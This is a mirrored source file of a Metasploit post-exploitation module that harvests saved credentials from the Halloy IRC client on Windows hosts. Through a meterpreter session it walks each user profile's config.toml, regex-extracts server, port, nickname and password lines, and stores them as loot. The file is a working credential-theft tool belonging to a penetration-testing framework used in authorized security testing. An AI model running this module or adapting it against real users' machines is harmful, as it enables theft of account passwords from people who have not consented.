Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/halloy_irc.rb
19670 views
1
# This module requires Metasploit: https://metasploit.com/download
2
# Current source: https://github.com/rapid7/metasploit-framework
3
##
4
5
class MetasploitModule < Msf::Post
6
include Msf::Post::File
7
include Msf::Post::Windows::UserProfiles
8
include Msf::Post::Windows::Packrat
9
ARTIFACTS =
10
{
11
application: 'Halloy IRC',
12
app_category: 'IRC',
13
gatherable_artifacts: [
14
{
15
filetypes: 'logins',
16
path: 'AppData',
17
dir: 'halloy',
18
artifact_file_name: 'config.toml',
19
description: 'Saved Bookmarks',
20
credential_type: 'text',
21
regex_search: [
22
{
23
extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
24
extraction_type: 'credentials',
25
regex: [
26
'(?i-mx:server =.*)',
27
'(?i-mx:port =.*)',
28
'(?i-mx:nickname =.*)',
29
'(?i-mx:password =.*)'
30
]
31
}
32
]
33
}
34
]
35
}.freeze
36
37
def initialize(info = {})
38
super(
39
update_info(
40
info,
41
'Name' => 'Halloy IRC Credential Gatherer',
42
'Description' => %q{
43
This module searches for credentials stored on Halloy IRC Client on a Windows host.
44
},
45
'License' => MSF_LICENSE,
46
'Author' => [
47
'Jacob Tierney',
48
'Kazuyoshi Maruta',
49
'Daniel Hallsworth',
50
'Barwar Salim M',
51
'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
52
],
53
'Platform' => ['win'],
54
'SessionTypes' => ['meterpreter'],
55
'Notes' => {
56
'Stability' => [CRASH_SAFE],
57
'Reliability' => [],
58
'SideEffects' => []
59
}
60
)
61
)
62
63
register_options(
64
[
65
OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
66
OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
67
# enumerates the options based on the artifacts that are defined below
68
OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
69
]
70
)
71
end
72
73
def run
74
print_status('Filtering based on these selections: ')
75
print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
76
print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
77
print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
78
79
# used to grab files for each user on the remote host
80
grab_user_profiles.each do |userprofile|
81
run_packrat(userprofile, ARTIFACTS)
82
end
83
84
print_status 'PackRat credential sweep completed'
85
end
86
end
87
88